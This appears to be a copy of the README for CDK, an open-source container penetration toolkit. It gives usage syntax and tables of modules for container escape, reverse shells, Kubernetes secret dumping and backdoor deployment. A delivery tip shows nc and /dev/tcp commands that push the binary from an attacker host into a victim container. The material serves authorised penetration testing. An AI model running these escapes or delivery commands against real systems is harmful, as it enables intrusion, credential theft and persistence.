ROOT /

detail /

CDK.md

History

282 lines | UTF-8 | 17 KB

Blame

CDK https://github.com/cdk-team/CDK

CDK - Zero Dependency Container Penetration Toolkit

English | 简体中文

png

Legal Disclaimer

Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.

Overview

CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.

Installation/Delivery

Download latest release in https://github.com/cdk-team/CDK/releases/

Drop executable files into the target container and start testing.

TIPS: Deliver CDK into target container in real-world penetration testing

If you have an exploit that can upload a file, then you can upload CDK binary directly.

If you have a RCE exploit, but the target container has no curl or wget, you can use the following method to deliver CDK:

First, host CDK binary on your host with public IP.

(on your host)
nc -lvp 999 < cdk

Inside the victim container execute

cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Usage

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk auto-escape <cmd>
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Auto Escape:
  cdk auto-escape <cmd>                     Escape container in different ways then let target execute <cmd>.

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.

Features

CDK has three modules:

Evaluate: gather information inside container to find potential weakness.
Exploit: for container escaping, persistance and lateral movement
Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

This command will run the scripts below without local file scanning, using --full to enable all.

Tactics	Script	Supported	Usage/Example
Information Gathering	OS Basic Info	✔	link
Information Gathering	Available Capabilities	✔	link
Information Gathering	Available Linux Commands	✔	link
Information Gathering	Mounts	✔	link
Information Gathering	Net Namespace	✔	link
Information Gathering	Sensitive ENV	✔	link
Information Gathering	Sensitive Process	✔	link
Information Gathering	Sensitive Local Files	✔	link
Information Gathering	Kube-proxy Route Localnet(CVE-2020-8558)	✔	link
Discovery	K8s Api-server Info	✔	link
Discovery	K8s Service-account Info	✔	link
Discovery	Cloud Provider Metadata API	✔	link

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]

Tactic	Technique	CDK Exploit Name	Supported	In Thin	Doc
Escaping	docker-runc CVE-2019-5736	runc-pwn	✔	✔
Escaping	containerd-shim CVE-2020-15257	shim-pwn	✔		link
Escaping	docker.sock PoC (DIND attack)	docker-sock-check	✔	✔	link
Escaping	docker.sock RCE	docker-sock-pwn	✔	✔	link
Escaping	Docker API(2375) RCE	docker-api-pwn	✔	✔	link
Escaping	Device Mount Escaping	mount-disk	✔	✔	link
Escaping	LXCFS Escaping	lxcfs-rw	✔	✔	link
Escaping	Cgroups Escaping	mount-cgroup	✔	✔	link
Escaping	Abuse Unprivileged User Namespace Escaping CVE-2022-0492	abuse-unpriv-userns	✔	✔	link
Escaping	Procfs Escaping	mount-procfs	✔	✔	link
Escaping	Ptrace Escaping PoC	check-ptrace	✔	✔	link
Escaping	Rewrite Cgroup(devices.allow)	rewrite-cgroup-devices	✔	✔	link
Escaping	Read arbitrary file from host system (CAP_DAC_READ_SEARCH)	cap-dac-read-search	✔	✔	link
Discovery	K8s Component Probe	service-probe	✔	✔	link
Discovery	Dump Istio Sidecar Meta	istio-check	✔	✔	link
Discovery	Dump K8s Pod Security Policies	k8s-psp-dump	✔		link
Remote Control	Reverse Shell	reverse-shell	✔	✔	link
Credential Access	Registry BruteForce	registry-brute	✔	✔	link
Credential Access	Access Key Scanning	ak-leakage	✔	✔	link
Credential Access	Dump K8s Secrets	k8s-secret-dump	✔	✔	link
Credential Access	Dump K8s Config	k8s-configmap-dump	✔	✔	link
Privilege Escalation	K8s RBAC Bypass	k8s-get-sa-token	✔	✔	link
Persistence	Deploy WebShell	webshell-deploy	✔	✔	link
Persistence	Deploy Backdoor Pod	k8s-backdoor-daemonset	✔	✔	link
Persistence	Deploy Shadow K8s api-server	k8s-shadow-apiserver	✔		link
Persistence	K8s MITM Attack (CVE-2020-8554)	k8s-mitm-clusterip	✔	✔	link
Persistence	Deploy K8s CronJob	k8s-cronjob	✔	✔	link

Note about Thin: The thin release is prepared for short life container shells such as serverless functions. We add build tags in source code and cut a few exploits to get the binary lighter. The 2MB file contains 90% of CDK functions, also you can pick up useful exploits in CDK source code to build your own lightweight binary.

Tool Module

Running commands like in Linux, little different in input-args, see the usage link.

cdk nc [options]
cdk ps

Command	Description	Supported	Usage/Example
nc	TCP Tunnel	✔	link
ps	Process Information	✔	link
ifconfig	Network Information	✔	link
vi	Edit Files	✔	link
kcurl	Request to K8s api-server	✔	link
dcurl	Request to Docker HTTP API	✔	link
ucurl	Request to Docker Unix Socket	✔	link
rcurl	Request to Docker Registry API
probe	IP/Port Scanning	✔	link

Release Document

If you want to know how we released a new version, how thin is produced, why we provide upx versions, what the differences between different versions about all, normal, thin, upx are, and how to choose specific CDK exploits and tools to compile an own release for yourself, please check the Release Document.

Developer Docs

run test in container.

Contributing to CDK

First off, thanks for taking the time to contribute!

By reporting any issue, ideas or PRs, your GitHub ID will be listed here.

https://github.com/cdk-team/CDK/blob/main/thanks.md

Bug Reporting

Bugs are tracked as GitHub Issues. Create an issue with the current CDK version, error msg and the environment. Describe the exact steps which reproduce the problem.

Suggesting Enhancements

Enhancement suggestions are tracked as GitHub Discussions. You can publish any thoughts here to discuss with developers directly.

Pull Requests

Fix problems or maintain CDK's quality:

Describe the current CDK version, environment, problem and exact steps that reproduce the problem.
Running screenshots or logs before and after you fix the problem.

New feature or exploits:

Explain why this enhancement would be useful to other users.
Please enable a sustainable environment for us to review contributions.
Screenshots about how this new feature works.
If you are committing a new evaluate/exploit scripts, please add a simple doc to your PR message, here is an example.

项目相关

2021-11-11 发布文章《CDK:一款针对容器场景的多功能渗透工具》

CDK https://github.com/cdk-team/CDK

CDK - Zero Dependency Container Penetration Toolkit

Legal Disclaimer

Overview

Installation/Delivery

TIPS: Deliver CDK into target container in real-world penetration testing

Usage

Features

Evaluate Module

Exploit Module

Tool Module

Release Document

Developer Docs

Contributing to CDK

Bug Reporting

Suggesting Enhancements

Pull Requests

项目相关

最近更新

[v1.2.0] - 2022-06-25

[v1.1.0] - 2022-05-30

[v1.0.6] - 2022-03-10

[v1.0.5] - 2022-03-06

[v1.0.4] - 2021-10-02